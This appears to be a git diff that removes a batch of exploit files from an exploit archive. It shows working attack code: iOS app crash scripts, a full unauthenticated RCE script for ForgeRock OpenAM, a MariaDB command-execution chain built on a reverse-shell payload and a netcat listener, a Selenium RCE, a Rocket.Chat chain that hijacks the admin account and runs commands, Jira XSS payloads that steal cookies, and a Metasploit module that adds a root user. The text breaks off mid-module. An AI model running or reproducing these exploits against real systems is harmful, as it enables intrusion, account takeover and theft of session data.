-# Date: 06-14-2021
-# Author: Geovanni Ruiz
-# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
-# Version: 3.0.3
-# Category: DoS (iOS)
-
-##### Vulnerability #####
-
-Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
-
-# STEPS #
-# Open the program.
-# Create a new Note.
-# Run the python exploit script payload.py, it will create a new payload.txt file
-# Copy the content of the file "payload.txt"
-# Paste the content from payload.txt twice in the new Note.
-# Crashed
-
-Successful exploitation will cause the application to stop working.
-
-I have been able to test this exploit against iOS 14.2.
-
-##### PoC #####
---> payload.py <--
-#!/usr/bin/env python
-buffer = "\x41" * 350000
-
-try:
- f = open("payload.txt","w")
- f.write(buffer)
- f.close()
- print ("File created")
-except:
- print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50002.py b/exploits/ios/dos/50002.py
deleted file mode 100755
index 7ad0008ff..000000000
--- a/exploits/ios/dos/50002.py
+++ /dev/null
@@ -1,37 +0,0 @@
-# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
-# Date: 06-14-2021
-# Author: Geovanni Ruiz
-# Download Link: https://apps.apple.com/es/app/post-it/id920127738
-# Version: 5.0.1
-# Category: DoS (iOS)
-
-##### Vulnerability #####
-
-Post-it is vulnerable to a DoS condition when a long list of characters is
-being used when creating a note:
-
-# STEPS #
-# Open the program.
-# Create a new Note.
-# Run the python exploit script payload.py, it will create a new
-payload.txt file
-# Copy the content of the file "payload.txt"
-# Paste the content from payload.txt twice in the new Note.
-# Crashed
-
-Successful exploitation will cause the application to stop working.
-
-I have been able to test this exploit against iOS 14.2.
-
-##### PoC #####
---> payload.py <--
-#!/usr/bin/env python
-buffer = "\x41" * 350000
-
-try:
-f = open("payload.txt","w")
-f.write(buffer)
-f.close()
-print ("File created")
-except:
-print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50003.py b/exploits/ios/dos/50003.py
deleted file mode 100755
index f13b9dbc2..000000000
--- a/exploits/ios/dos/50003.py
+++ /dev/null
@@ -1,36 +0,0 @@
-# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
-# Date: 06-14-2021
-# Author: Geovanni Ruiz
-# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
-# Version: 6.4
-# Category: DoS (iOS)
-
-##### Vulnerability #####
-
-Notex – the best notes is vulnerable to a DoS condition when a long list of
-characters is being used when creating a note:
-
-# STEPS #
-# Open the program.
-# Create a new Note.
-# Run the python exploit script payload.py, it will create a new payload.txt file
-# Copy the content of the file "payload.txt"
-# Paste the content from payload.txt twice in the new Note.
-# Crashed
-
-Successful exploitation will cause the application to stop working.
-
-I have been able to test this exploit against iOS 14.2.
-
-##### PoC #####
---> payload.py <--
-#!/usr/bin/env python
-buffer = "\x41" * 350000
-
-try:
-f = open("payload.txt","w")
-f.write(buffer)
-f.close()
-print ("File created")
-except:
-print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/local/49977.py b/exploits/ios/local/49977.py
deleted file mode 100755
index 7dda87b05..000000000
--- a/exploits/ios/local/49977.py
+++ /dev/null
@@ -1,35 +0,0 @@
-# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
-# Date: 06-09-2021
-# Author: Geovanni Ruiz
-# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
-# Version: 4.2
-# Category: DoS (iOS)
-
-##### Vulnerability #####
-
-Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
-
-# STEPS #
-# Open the program.
-# Create a new Note.
-# Run the python exploit script payload.py, it will create a new payload.txt file
-# Copy the content of the file "payload.txt"
-# Paste the content from payload.txt twice in the new Note.
-# Crashed
-
-Successful exploitation will cause the application to stop working.
-
-I have been able to test this exploit against iOS 14.2.
-
-##### PoC #####
---> payload.py <--
-#!/usr/bin/env python
-buffer = "\x41" * 350000
-
-try:
- f = open("payload.txt","w")
- f.write(buffer)
- f.close()
- print ("File created")
-except:
- print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/java/webapps/50131.py b/exploits/java/webapps/50131.py
deleted file mode 100755
index 045d7444f..000000000
--- a/exploits/java/webapps/50131.py
+++ /dev/null
@@ -1,152 +0,0 @@ -# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) -# Date: 2021-07-14 -# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be -# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 -# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ -# Version: [1] OpenAM 14.6.3 -# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 -# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 -# CVE: CVE-2021-35464 - -#!/usr/bin/env python3 - -''' - Copyright 2021 Photubias(c) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - File name CVE-2021-35464.py - written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be - - This is a native implementation without requirements, written in Python 3. 
- Works equally well on Windows as Linux (as MacOS, probably ;-) - - Rewritten from and full credits to @Y4er_ChaBug: - https://github.com/Y4er/openam-CVE-2021-35464 - and of course the discoverer @artsploit: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 - Created using https://github.com/frohoff/ysoserial -''' - -import urllib.request, urllib.parse, ssl, sys, optparse - -## Static vars; change at will, but recommend leaving as is -sURL = 'http://192.168.0.100:7080/openam' -sEndpoint = 'ccversion/Version' -sEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs -iTimeout = 5 -strSerializedPayload = b'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$' - -## Ignore unsigned certs, if any because OpenAM is default HTTP -ssl._create_default_https_context = ssl._create_unverified_context - -def checkParams(options, args): - if args: sHost = args[0] - else: - sHost = input('[?] Please enter the URL ['+sURL+'] : ') - if sHost == '': sHost = sURL - if not sHost[-1:] == '/': sHost += '/' - if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost - if options.command: sCMD = options.command - else: sCMD = '' - if options.proxy: sProxy = options.proxy - else: sProxy = '' - return (sHost, sCMD, sProxy) - -def findEndpoint(oOpener, sHost, sProxy): - def testEndpoint(sURL): - oRequest = urllib.request.Request(sURL) - if sProxy: oRequest.set_proxy(sProxy, 'http') - try: oResponse = oOpener.open(oRequest, timeout = iTimeout) - except: return False - if oResponse.code == 200: - if 'ForgeRock' in oResponse.read().decode(errors='ignore'): - print('[+] Found potential vulnerable endpoint: ' + sURL) - return True - return False - - if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint - elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint - elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint - elif testEndpoint(sHost + 
'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' - elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' - else: return '' - -def testVuln(oOpener, sURL, sProxy): - oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') - ## The response is actually not well formed HTTP, needs manual formatting - bResp = bytearray(15) ## "CVE-2021-35464\n" should be 15 bytes - try: oResponse.readinto(bResp) - except: pass - #print(bResp.split(b'\x00')[0]) - if 'CVE-2021-35464' in bResp.decode(): return True - else: return False - -def runVuln(oOpener, sURL, sProxy, sCMD): - oResponse = runCmd(oOpener, sURL, sProxy, sCMD) - ## The response is actually not well formed HTTP, needs manual formatting - bResp = bytearray(4096) - try: oResponse.readinto(bResp) - except: pass ## The readinto still should have worked - sResp = bResp.split(b'\x00')[0].decode() - print(sResp) - -def runCmd(oOpener, sURL, sProxy, sCMD): - oData = b'jato.pageSession=' + strSerializedPayload - oHeaders = {'cmd' : sCMD} - oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) - if sProxy: oRequest.set_proxy(sProxy, 'http') - return oOpener.open(oRequest, timeout = iTimeout) - -def main(): - usage = ( - 'usage: %prog [options] URL \n' - 'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\n' - 'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\n' - 'When in doubt, just enter a single IP address' - ) - - parser = optparse.OptionParser(usage=usage) - parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') - parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') - - ## Get or ask for the vars - (options, args) = parser.parse_args() - (sHost, sCMD, sProxy) = checkParams(options, args) - - ## Verify reachability - print('[!] 
Verifying reachability of ' + sHost) - oOpener = urllib.request.build_opener() - oRequest = urllib.request.Request(sHost) - if sProxy: oRequest.set_proxy(sProxy, 'http') - try: oResponse = oOpener.open(oRequest, timeout = iTimeout) - except urllib.error.HTTPError: pass - except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') - print('[+] Endpoint ' + sHost + ' reachable') - - ## Find endpoint - print('[!] Finding correct OpenAM endpoint') - sEndpoint = findEndpoint(oOpener, sHost, sProxy) - if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') - - ## Verify vulnerability - if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') - else: sys.exit('[-] Not vulnerable or this implementation does not work') - if sCMD: - print('[+] Running command "' + sCMD + '" now:\n') - runVuln(oOpener, sEndpoint, sProxy, sCMD) - else: print('[!] All done') - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/exploits/linux/local/49765.txt b/exploits/linux/local/49765.txt deleted file mode 100644 index f68d095da..000000000 --- a/exploits/linux/local/49765.txt +++ /dev/null 
@@ -1,20 +0,0 @@
-# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
-# Date: 03/18/2021
-# Exploit Author: Central InfoSec
-# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
-# Tested on: Linux
-# CVE : CVE-2021-27928
-
-# Proof of Concept:
-
-# Create the reverse shell payload
-msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so
-
-# Start a listener
-nc -lvp
-
-# Copy the payload to the target machine (In this example, SCP/SSH is used)
-scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so
-
-# Execute the payload
-mysql -u -p -h -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
\ No newline at end of file
diff --git a/exploits/linux/webapps/49915.rb b/exploits/linux/webapps/49915.rb
deleted file mode 100755
index 432420b20..000000000
--- a/exploits/linux/webapps/49915.rb
+++ /dev/null
@@ -1,79 +0,0 @@ -# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) -# Date: 2021-05-27 -# Exploit Author: Jon Stratton -# Vendor Homepage: https://www.selenium.dev/ -# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar -# Version: 3.141.59 -# Tested on: Selenium Server 3.141.59, webdriver, geckodriver -# -# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb -# -# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started. -# -# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh” -# -# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system. -# -# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type. - -#!/usr/bin/env ruby - -require 'optparse' -require 'net/http' -require 'json' -require 'uri' -require 'zip' -require 'base64' - -options = {} -OptionParser.new do |opts| - opts.banner = 'Usage: example.rb [options]' - opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h| - options[:hub] = h - end - opts.on('--help', 'Prints this help') do - puts opts - exit - end -end.parse! - -hub_url = options[:hub] - -payload = 'rm -rf $0 -echo success > /tmp/selenium_node_rce.txt' - -# Build profile zip file. 
-stringio = Zip::OutputStream::write_buffer do |io| - # Create a handler for shell scripts - io.put_next_entry("handlers.json") - io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}') -end -stringio.rewind -encoded_profile = Base64.strict_encode64(stringio.sysread) - -# Create session with our new profile -newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}} - -uri = URI.parse(hub_url) -http = Net::HTTP.new(uri.host, uri.port) - -# Start session with encoded_profile and save session id for cleanup. -uri = URI.parse("%s/session" % [hub_url]) -request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') -request.body = JSON.generate(newSession) -response = http.request(request) -sessionId = JSON.parse(response.body)["value"]["sessionId"] - -# URL. -data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)] -uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId]) -request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') -request.body = JSON.generate(:url => data_url) -response = http.request(request) - -# End session(not working) -uri = URI.parse("%s/session/%s" % [hub_url, sessionId]) -request = Net::HTTP::Delete.new(uri.request_uri) -http.request(request) - -exit \ No newline at end of file diff --git a/exploits/linux/webapps/49960.py b/exploits/linux/webapps/49960.py deleted file mode 100755 index 0876dc164..000000000 --- a/exploits/linux/webapps/49960.py +++ /dev/null 
@@ -1,172 +0,0 @@ -# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) -# Author: enox -# Date: 06-06-2021 -# Product: Rocket.Chat -# Vendor: https://rocket.chat/ -# Vulnerable Version(s): Rocket.Chat 3.12.1 -# CVE: CVE-2021-22911 -# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat - -#!/usr/bin/python - -import requests -import string -import time -import hashlib -import json -import oathtool -import argparse - -parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') -parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) -parser.add_argument('-a', help='Administrator email', required=True) -parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) -args = parser.parse_args() - - -adminmail = args.a -lowprivmail = args.u -target = args.t - - -def forgotpassword(email,url): - payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) - print("[+] Password Reset Email Sent") - - -def resettoken(url): - u = url+"/api/v1/method.callAnon/getPasswordPolicy" - headers={'content-type': 'application/json'} - token = "" - - num = list(range(0,10)) - string_ints = [str(int) for int in num] - characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints - - while len(token)!= 43: - for c in characters: - payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) - r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) - time.sleep(0.5) - if 'Meteor.Error' not in r.text: - token += c - print(f"Got: {token}") - - print(f"[+] Got token : 
{token}") - return token - - -def changingpassword(url,token): - payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) - if "error" in r.text: - exit("[-] Wrong token") - print("[+] Password was changed !") - - -def twofactor(url,email): - # Authenticating - sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() - payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) - if "error" in r.text: - exit("[-] Couldn't authenticate") - data = json.loads(r.text) - data =(data['message']) - userid = data[32:49] - token = data[60:103] - print(f"[+] Succesfully authenticated as {email}") - - # Getting 2fa code - cookies = {'rc_uid': userid,'rc_token': token} - headers={'X-User-Id': userid,'X-Auth-Token': token} - payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' - r = requests.get(url+payload,cookies=cookies,headers=headers) - code = r.text[46:98] - print(f"Got the code for 2fa: {code}") - return code - - -def changingadminpassword(url,token,code): - payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, 
verify = False, allow_redirects = False) - if "403" in r.text: - exit("[-] Wrong token") - - print("[+] Admin password changed !") - - -def rce(url,code,cmd): - # Authenticating - sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() - headers={'content-type': 'application/json'} - payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' - r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) - if "error" in r.text: - exit("[-] Couldn't authenticate") - data = json.loads(r.text) - data =(data['message']) - userid = data[32:49] - token = data[60:103] - print("[+] Succesfully authenticated as administrator") - - # Creating Integration - payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' - cookies = {'rc_uid': userid,'rc_token': token} - headers = {'X-User-Id': userid,'X-Auth-Token': token} - r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) - data = r.text - data = data.split(',') - token = data[12] - token = token[9:57] - _id = data[18] - _id = _id[7:24] - - # Triggering RCE - u = url + '/hooks/' + _id + '/' +token - r = requests.get(u) - print(r.text) - -############################################################ - - -# Getting Low Priv user -print(f"[+] Resetting {lowprivmail} password") -## Sending Reset Mail -forgotpassword(lowprivmail,target) - -## Getting reset token -token = resettoken(target) - -## Changing Password -changingpassword(target,token) - - -# Privilege 
Escalation to admin -## Getting secret for 2fa -secret = twofactor(target,lowprivmail) - - -## Sending Reset mail -print(f"[+] Resetting {adminmail} password") -forgotpassword(adminmail,target) - -## Getting reset token -token = resettoken(target) - - -## Resetting Password -code = oathtool.generate_otp(secret) -changingadminpassword(target,token,code) - -## Authenticting and triggering rce - -while True: - cmd = input("CMD:> ") - code = oathtool.generate_otp(secret) - rce(target,code,cmd) \ No newline at end of file diff --git a/exploits/macos/webapps/50068.txt b/exploits/macos/webapps/50068.txt deleted file mode 100644 index 9c0b234d8..000000000 --- a/exploits/macos/webapps/50068.txt +++ /dev/null 
@@ -1,27 +0,0 @@
-# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
-# Date: 06/05/2021
-# Exploit Author: CAPTAIN_HOOK
-# Vendor Homepage: https://www.atlassian.com/
-# Software Link: https://www.atlassian.com/software/jira/download/data-center
-# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
-# Tested on: ANY
-# CVE : CVE-2021-26078
-
-Description:
-
-The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
-*Fixed versions:*
-
- - 8.5.14
- - 8.13.6
- - 8.16.1
- - 8.17.0
-
-POC:
-
- - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
-user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
-Your XSS Will be triggered immediately.
-
-Reference:
-https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49367.txt b/exploits/multiple/webapps/49367.txt
deleted file mode 100644
index e6e20dc27..000000000
--- a/exploits/multiple/webapps/49367.txt
+++ /dev/null
@@ -1,37 +0,0 @@
-# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
-# Date: 30-12-2020
-# Exploit Author: Mesut Cetin
-# Vendor Homepage: http://egavilanmedia.com
-# Version: 1.0
-# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34
-
-Vulnerable parameter: email, gender, username
-Payload:
-
-Proof of Concept:
-
-To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:
-
-1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
-2. Click above right on the "Profile" tab
-3. Navigate to the "Edit Profile" tab
-4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
-5. Capture the POST request in Burp Suite and manipulate the parameter as shown:
-
-POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
-Host: demo.egavilanmedia.com
-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
-Accept: application/json, text/javascript, */*; q=0.01
-Accept-Language: de,en-US;q=0.7,en;q=0.3
-Accept-Encoding: gzip, deflate
-Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-X-Requested-With: XMLHttpRequest
-Content-Length: 180
-Origin: http://demo.egavilanmedia.com
-Connection: close
-Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
-Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e
-
-fullname=admin&username=&email=&gender==&action=update_admin
-
-6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like , the session cookies can be send to the attacker.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49435.rb b/exploits/multiple/webapps/49435.rb
deleted file mode 100755
index 8d45bcaca..000000000
--- a/exploits/multiple/webapps/49435.rb
+++ /dev/null
@@ -1,112 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,
- 'Description' => %q{
- This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
- HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
- can be performed without the need for any session(cookie) information.
- Therefore, the session cookie informations of the active users in the application can be read from the response content.
- A new authorized user can be created with the obtained cookie.
- },
- 'References' =>
- [
- [ 'CVE', '' ],
- [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
- [ 'URL', 'https://www.netsia.com' ]
- ],
- 'Author' =>
- [
- 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus
- ],
- 'License' => MSF_LICENSE,
- 'DisclosureDate' => "2021-01-06",
- 'DefaultOptions' => { 'SSL' => true }
- ))
-
- register_options(
- [
- Opt::RPORT(443),
- OptString.new('USERNAME', [true, 'The username for your new account']),
- OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
- ])
- end
-
- def peer
- "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
- end
-
- def check
- begin
- res = send_request_cgi(
- 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
- )
-
- rescue
- return Exploit::CheckCode::Unknown
- end
-
- if res.code == 200 and res.body.include? 'sessionId'
- return Exploit::CheckCode::Vulnerable
- else
- if res.code == 200 and res.body.include? 'SUCCESS'
- print_status("Target is vulnerable! 
But active admin session was not found. Try again later.") - return Exploit::CheckCode::Appears - end - end - - return Exploit::CheckCode::Safe - end - - def count_user(data, find_string) - data.scan(/(?=#{find_string})/).count - end - - def run - unless Exploit::CheckCode::Vulnerable == check - fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') - end - - res = send_request_cgi( - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), - ) - sescount = count_user(res.body,'"name"') - print_good("Currently #{sescount} active sessions have been detected.") - - cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) - puts cookies - $i = 0 - - while $i <= sescount do - sessloop = cookies[$i] - sessid = "SESSION=" + sessloop.to_s - cookie = sessid.split('"]').join('').split('["').join('') - $i +=1 - json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, 
{"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", 
